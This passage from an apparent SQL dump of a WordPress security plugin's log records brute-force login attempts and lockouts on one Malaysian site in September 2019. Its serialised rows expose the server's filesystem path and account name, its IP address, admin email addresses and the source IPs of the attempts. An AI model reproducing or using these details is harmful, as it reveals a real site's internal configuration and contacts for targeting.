Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"https://bintara.com.my/wp/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/wp/xmlrpc.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYX-d3kXpgmG5P@iB8kLWAAAAJE\";s:12:\"REDIRECT_URL\";s:14:\"/wp/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:15:\"162.144.123.107\";s:11:\"REMOTE_PORT\";s:5:\"50168\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:36:\"https://bintara.com.my/wp/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:14:\"/wp/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYX-d3kXpgmG5P@iB8kLWAAAAJE\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569062778.9904\";s:12:\"REQUEST_TIME\";s:10:\"1569062778\";}}','notice','2019-09-21 10:46:20','2019-09-21 10:46:19',18314576,19610864,'https://bintara.com.my/wp/xmlrpc.php',1,0,'162.144.123.107'),(25309,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 18:46:14\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 10:46:14\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:01:14\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:01:14\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 10:46:15','2019-09-21 10:46:14',17882072,19288912,'https://bintara.com.my/2019/wp-login.php',1,0,'35.188.77.30'),(25306,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 18:46:12\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 10:46:12\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:01:12\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:01:12\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 10:46:14','2019-09-21 10:46:12',17879304,19284304,'https://bintara.com.my/wp/wp-login.php',1,0,'162.144.123.107'),(25307,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 10:46:14','2019-09-21 10:46:12',18085048,19284304,'https://bintara.com.my/wp/wp-login.php',1,0,'162.144.123.107'),(25308,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"96\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYX-drfBTP0kPOVnb8jpFwAAAFI\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:12:\"35.188.77.30\";s:11:\"REMOTE_PORT\";s:5:\"42879\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYX-drfBTP0kPOVnb8jpFwAAAFI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569062774.296\";s:12:\"REQUEST_TIME\";s:10:\"1569062774\";}}','notice','2019-09-21 10:46:15','2019-09-21 10:46:14',17797376,19288912,'https://bintara.com.my/2019/wp-login.php',1,0,'35.188.77.30'),(25305,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"96\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYX-dFiJ7D9Gn7wDPh8UXQAAAMQ\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:15:\"162.144.123.107\";s:11:\"REMOTE_PORT\";s:5:\"49662\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYX-dFiJ7D9Gn7wDPh8UXQAAAMQ\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569062772.5538\";s:12:\"REQUEST_TIME\";s:10:\"1569062772\";}}','notice','2019-09-21 10:46:13','2019-09-21 10:46:12',17794536,19284304,'https://bintara.com.my/wp/wp-login.php',1,0,'162.144.123.107'),(25302,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 18:46:01\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 10:46:01\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:01:01\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:01:01\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 10:46:02','2019-09-21 10:46:01',17884240,19289808,'https://bintara.com.my/blog/wp-login.php',1,0,'139.59.172.23'),(25303,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 10:46:02','2019-09-21 10:46:01',18090008,19289808,'https://bintara.com.my/blog/wp-login.php',1,0,'139.59.172.23'),(25304,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/blog/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/blog/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/blog/xmlrpc.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYX-bLfBTP0kPOVnb8jpEAAAAEs\";s:12:\"REDIRECT_URL\";s:16:\"/blog/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:13:\"139.59.172.23\";s:11:\"REMOTE_PORT\";s:5:\"37314\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/blog/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:16:\"/blog/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYX-bLfBTP0kPOVnb8jpEAAAAEs\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569062764.1313\";s:12:\"REQUEST_TIME\";s:10:\"1569062764\";}}','notice','2019-09-21 10:46:05','2019-09-21 10:46:04',18314632,19611160,'https://bintara.com.my/blog/xmlrpc.php',1,0,'139.59.172.23'),(25301,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYX-aHkXpgmG5P@iB8kLKgAAAIg\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"139.59.172.23\";s:11:\"REMOTE_PORT\";s:5:\"37027\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYX-aHkXpgmG5P@iB8kLKgAAAIg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569062761.0224\";s:12:\"REQUEST_TIME\";s:10:\"1569062761\";}}','notice','2019-09-21 10:46:02','2019-09-21 10:46:01',17799368,19289808,'https://bintara.com.my/blog/wp-login.php',1,0,'139.59.172.23'),(25299,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 10:45:58','2019-09-21 10:45:57',18087648,19287184,'https://bintara.com.my/wordpress/wp-login.php',1,0,'103.28.52.13'),(25300,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:21:\"/wordpress/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:43:\"https://bintara.com.my/wordpress/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYX-ZnkXpgmG5P@iB8kLJQAAAIk\";s:12:\"REDIRECT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:12:\"103.28.52.13\";s:11:\"REMOTE_PORT\";s:5:\"53322\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:43:\"https://bintara.com.my/wordpress/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYX-ZnkXpgmG5P@iB8kLJQAAAIk\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569062758.6058\";s:12:\"REQUEST_TIME\";s:10:\"1569062758\";}}','notice','2019-09-21 10:45:59','2019-09-21 10:45:58',18313024,19608184,'https://bintara.com.my/wordpress/xmlrpc.php',1,0,'103.28.52.13'),(25298,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 18:45:57\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 10:45:57\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:00:57\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:00:57\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 10:45:58','2019-09-21 10:45:57',17881832,19287184,'https://bintara.com.my/wordpress/wp-login.php',1,0,'103.28.52.13'),(25297,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wordpress/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"103\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYX-ZLfBTP0kPOVnb8jpDgAAAEc\";s:12:\"REDIRECT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"REMOTE_ADDR\";s:12:\"103.28.52.13\";s:11:\"REMOTE_PORT\";s:5:\"52892\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:10:\"SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:1